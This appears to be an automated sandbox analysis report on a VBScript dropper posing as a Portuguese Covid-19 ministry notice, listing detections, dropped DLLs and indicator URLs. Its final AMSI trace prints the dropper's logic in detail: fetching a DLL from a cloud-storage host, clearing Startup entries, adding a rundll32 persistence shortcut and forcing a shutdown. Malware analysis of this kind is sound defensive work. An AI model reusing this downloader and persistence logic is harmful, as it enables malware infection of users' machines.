Source: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll |
Avira: detection malicious, Label: TR/Black.Gen2 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll |
Avira: detection malicious, Label: TR/Black.Gen2 |
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs |
Virustotal: Detection: 25% |
Source: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll |
Joe Sandbox ML: detected |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll |
Joe Sandbox ML: detected |
Source: |
Initial file: .write ZXDFVHIJXTXNZLNYYGEJOJNR.responseBody |
Source: |
Initial file: .savetofile LJETZISNBGIJOFCVGWUIZSLT, 2 |
Source: |
Initial file: .write BFLCAJXFUHBOZFMBDCLJVIWJ.responseBody |
Source: |
Initial file: .savetofile SASLHXXIDQYMUYFJXVRVATCD, 2 |
Source: Joe Sandbox View |
IP Address: 8.8.8.8 8.8.8.8 |
Source: Joe Sandbox View |
ASN Name: GOOGLEUS GOOGLEUS |
Source: wscript.exe, 00000001.00000002.1051218798.0000022DE835A000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0 |
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0? |
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp |
String found in binary or memory: http://ocsp.pki.goog/gsr202 |
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp |
String found in binary or memory: http://ocsp.pki.goog/gts1o1core0 |
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp |
String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0 |
Source: wscript.exe, 00000001.00000002.1048503032.0000022DE626D000.00000004.00000020.sdmp |
String found in binary or memory: https://login.live.com |
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp |
String found in binary or memory: https://pki.goog/repository/0 |
Source: wscript.exe, 00000001.00000002.1051098917.0000022DE824B000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/ |
Source: wscript.exe, 00000001.00000002.1051098917.0000022DE824B000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/kqKv) |
Source: wscript.exe, wscript.exe, 00000001.00000002.1050701507.0000022DE8060000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.1051196571.0000022DE8348000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip |
Source: wscript.exe, 00000001.00000002.1048655023.0000022DE632E000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip_)ik$ |
Source: wscript.exe, 00000001.00000002.1051196571.0000022DE8348000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zipjysv |
Source: wscript.exe, wscript.exe, 00000001.00000002.1050701507.0000022DE8060000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.1051196571.0000022DE8348000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dll |
Source: wscript.exe, 00000001.00000002.1048655023.0000022DE632E000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dll/ |
Source: wscript.exe, 00000001.00000002.1048655023.0000022DE632E000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dllenu |
Source: P-16-5[1].dll.1.dr |
Static PE information: .vmp0 and .vmp1 section names |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651 |
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs |
Initial sample: Strings found which are bigger than 50 |
Source: P-16-5[1].dll.1.dr |
Static PE information: Number of sections : 12 > 10 |
Source: classification engine |
Classification label: mal100.evad.winVBS@1/6@0/2 |
Source: C:\Windows\System32\wscript.exe |
File created: C:\Users\user\AppData\Roaming\eycptlzztfs.vbs |
Source: unknown |
Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs' |
Source: C:\Windows\System32\wscript.exe |
File read: C:\Users\desktop.ini |
Source: C:\Windows\System32\wscript.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Windows\System32\wscript.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs |
Virustotal: Detection: 25% |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 |
Source: C:\Windows\System32\wscript.exe |
Anti Malware Scan Interface: WScript.Shell")WScript.Sleep(300000)Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_& "Primary=true")for each OpSys in OpSysSetretVal = OpSys.Win32Shutdown(6)nextIHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Roaming\eycptlzztfs.vbs", "true");ITextStream.Write("Set SFHISGAPSMULDDGFLMFHDFTG = CreateObject("WScript.Shell")");ITextStream.Write("WScript.Sleep(300000)");ITextStream.Write("Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _");ITextStream.Write("& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_");ITextStream.Write("& "Primary=true")");ITextStream.Write("for each OpSys in OpSysSet");ITextStream.Write("retVal = OpSys.Win32Shutdown(6)");ITextStream.Write("next");ITextStream.Close();IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk", "true");IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs", "true");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateFolder("C:\Users\user\AppData\Roaming\24145662426947");IWshShell3.SpecialFolders("AppData");IWshShell3.SpecialFolders("AppData");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/0.zip", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\0.zip", "2");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/P-16-5.dll", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll", "2");IHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("StartUp");IHost.CreateObject("WScript.Shell");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjnpswnghs .lnk");IWshShortcut.TargetPath("rundll32");IWshShortcut.Arguments(" C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll SFsb9V5o7LTfxDWhDoh" |